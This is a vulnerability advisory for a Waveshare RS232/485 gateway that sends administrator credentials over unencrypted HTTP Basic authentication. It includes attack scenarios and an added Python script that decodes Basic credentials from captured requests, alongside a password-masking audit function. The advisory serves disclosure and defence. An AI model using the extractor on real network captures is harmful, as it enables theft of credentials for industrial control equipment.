Post 04 | Waveshare RS232/485 Gateway: Cleartext Transmission of Admin Credentials (CVE-2025-63364)
1. Executive Summary
CVSS v3.1 Base Score: 7.5 (High) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS v4.0 Base Score: 8.7 (High) — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N
CVE ID: CVE-2025-63364
ATTENTION: Exploitable remotely / no authentication or user interaction required
Vendor: Waveshare Electronics
Equipment: Waveshare RS232/485 TO WIFI ETH (B) Serial-to-Ethernet/Wi-Fi Gateway
Vulnerability: Cleartext Transmission of Administrator Credentials via HTTP Basic Authentication
The device transmits administrator credentials using HTTP Basic Authentication over unencrypted HTTP. Attackers on the same network segment can intercept credentials in transit and gain full administrative control of the device.
2. Risk Evaluation
This vulnerability poses significant security risk because:
- Credentials are only Base64-encoded, not encrypted, so anyone who captures the header recovers the password directly.
- No TLS/HTTPS support exists, exposing all authentication traffic.
- Attackers with access to the same subnet can compromise credentials passively.
- Once compromised, attackers can alter serial routing, manipulate network settings, or pivot deeper into ICS/IIoT networks.
- Exposure can lead to unauthorized device reconfiguration or operational disruption.
In environments where serial devices bridge critical automation systems, a compromised gateway may impact process reliability and safety.
3. Technical Details
3.1 Affected Products
- Waveshare RS232/485 TO WIFI ETH (B)
- Firmware: V3.1.1.0
- Hardware: 4.3.2.1
- Web Interface: V7.04T.07.002880.0301
3.2 Vulnerability Description
The device uses HTTP Basic Authentication for administrative login.
Because the device lacks HTTPS support:
- All authentication requests are sent in plaintext
- Credentials are carried in the Authorization: header, encoded in Base64
- Base64 is an encoding, not encryption; it is trivially reversible, so credential recovery is immediate
- Browsers resend the Authorization: header with every subsequent request to the same realm, so the credentials can be captured from any page load, not only the initial login
Example captured header:
    Authorization: Basic YWRtaW46YWRtaW4=
Decoded:
    admin:admin
This exposure affects all network paths between client and device, including switches, access points, and mirrored traffic captures.
3.3 Attack Scenarios
Scenario 1 — Passive network sniffing
An attacker on the same LAN or Wi-Fi network captures HTTP traffic and extracts the credentials.
Scenario 2 — Rogue access point
If the device is configured over Wi-Fi, an attacker creates a malicious AP to intercept connections.
Scenario 3 — ARP poisoning
An attacker spoofs ARP replies to place themselves between the configuration workstation and the gateway, relaying traffic while capturing each Authorization: header. Without dynamic ARP inspection on the switch, this is rarely noticed.
Scenario 4 — Compromised workstation
A malware-infected configuration workstation can read outbound Authorization headers.
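As an added example (not part of the original advisory and not the researcher's tooling), the following Python script does what every scenario above relies on: it parses raw HTTP requests as a passive sniffer on the gateway's subnet would capture them, finds Basic Authentication headers, and decodes the credentials. The request bytes, the host 192.0.2.10 and the credential values are constructed for the example. The audit_capture function shows the defender's side of the same parsing: a check that reports where Basic credentials are crossing the wire in the clear, with the password masked so the finding can go into a ticket.

```python
"""Extract HTTP Basic Authentication credentials from captured HTTP requests.

Added example, not from the advisory. SAMPLE_REQUESTS is constructed to mimic
the TCP payloads a passive sniffer would see on port 80; it is not a real
capture from the Waveshare gateway.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample requests (one TCP payload each). Host 192.0.2.10 and the
# credential values are assumptions for the example.
SAMPLE_REQUESTS: List[bytes] = [
    b"GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    b"Authorization: Basic YWRtaW46YWRtaW4=\r\n\r\n",          # admin:admin
    b"GET /status.html HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",  # no credentials
    b"GET /api HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    b"Authorization: Bearer abc123\r\n\r\n",                   # not Basic
    b"GET /cfg HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    b"authorization: basic YWRtaW4=\r\n\r\n",                  # decodes to "admin", no ':'
    b"GET /cfg HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    b"Authorization: Basic YWRtaW4\r\n\r\n",                   # invalid Base64 padding
]

# Header names are case-insensitive (RFC 7230), as is the "Basic" scheme token.
_BASIC_RE = re.compile(rb"^authorization:\s*basic\s+([A-Za-z0-9+/=]+)\s*$", re.IGNORECASE)
_HOST_RE = re.compile(rb"^host:\s*(\S+)\s*$", re.IGNORECASE)


def extract_basic_credentials(request: bytes) -> Optional[Tuple[str, str]]:
    """Return (username, password) if the request carries a decodable Basic header.

    Returns None for requests without headers, without a Basic header, with a
    value that is not valid Base64, or whose decoded form lacks the ':' that
    RFC 7617 requires between user and password.
    """
    head, sep, _body = request.partition(b"\r\n\r\n")
    if not sep:
        return None  # header block not complete; nothing to parse yet
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        match = _BASIC_RE.match(line)
        if not match:
            continue
        try:
            decoded = base64.b64decode(match.group(1), validate=True)
        except (binascii.Error, ValueError):
            return None
        user, colon, password = decoded.partition(b":")
        if not colon:
            return None
        return user.decode("utf-8", "replace"), password.decode("utf-8", "replace")
    return None


def _host_of(request: bytes) -> str:
    """Best-effort Host header value, used to say which device leaked credentials."""
    head = request.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n"):
        match = _HOST_RE.match(line)
        if match:
            return match.group(1).decode("ascii", "replace")
    return "unknown"


def audit_capture(requests: List[bytes]) -> List[Dict[str, str]]:
    """Defender's view: one finding per request that leaks Basic credentials.

    The password is masked (first character kept) because the output is meant
    for a SOC ticket, not for reuse.
    """
    findings: List[Dict[str, str]] = []
    for req in requests:
        creds = extract_basic_credentials(req)
        if creds is None:
            continue
        user, password = creds
        masked = (password[:1] + "*" * (len(password) - 1)) if password else ""
        findings.append({"host": _host_of(req), "user": user, "password_masked": masked})
    return findings


if __name__ == "__main__":
    # Attacker's view: the cleartext credential falls straight out of the header.
    print("recovered:", extract_basic_credentials(SAMPLE_REQUESTS[0]))
    # Defender's view: same parsing, reported as a finding.
    for finding in audit_capture(SAMPLE_REQUESTS):
        print("cleartext Basic auth to", finding["host"], "as", finding["user"],
              "password", finding["password_masked"])
```

Run against a live capture, the only change is the source of the bytes: reassembled TCP payloads from the management network replace SAMPLE_REQUESTS. Any finding against the gateway's address confirms that administrator credentials are crossing the segment in the clear, which is the condition the mitigations below are meant to remove.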
4. Mitigations
User Recommendations
- Avoid configuring the device on public or shared networks.
- If available, segment device access to a management VLAN.
- Rotate administrator credentials frequently.
- Monitor for suspicious login attempts.
- Review CISA guidance for ICS network segmentation:
https://www.cisa.gov/news-events/ics-alerts/ics-alert-10-301-01
Vendor Recommendations
- Implement HTTPS/TLS support.
- Replace Basic Auth with token-based or session-based authentication.
- Provide local certificate generation or import options.
- Mask sensitive fields in all web responses.
5. Disclosure Timeline
- 16 Sep 2025 — Researcher reported vulnerability to Waveshare
- 23 Sep 2025 — Vendor acknowledged report
- 23–27 Sep 2025 — Researcher requested detailed remediation timeline; none provided
- 27 Sep 2025 — Researcher informed vendor of escalation to MITRE
- 29 Sep 2025 — Reported to MITRE for CVE assignment
- 10 Nov 2025 — CVE reserved
- 11 Nov 2025 — Public disclosure
6. Background
This gateway is used in:
- industrial automation (PLC/RTU/SCADA communication),
- IIoT deployments,
- remote monitoring and telemetry,
- smart building applications,
- embedded development.
Because credentials grant full device control, insecure handling significantly increases operational risk.
7. Researcher
Abhishek Pandey
Payatu Security Consulting Pvt. Ltd.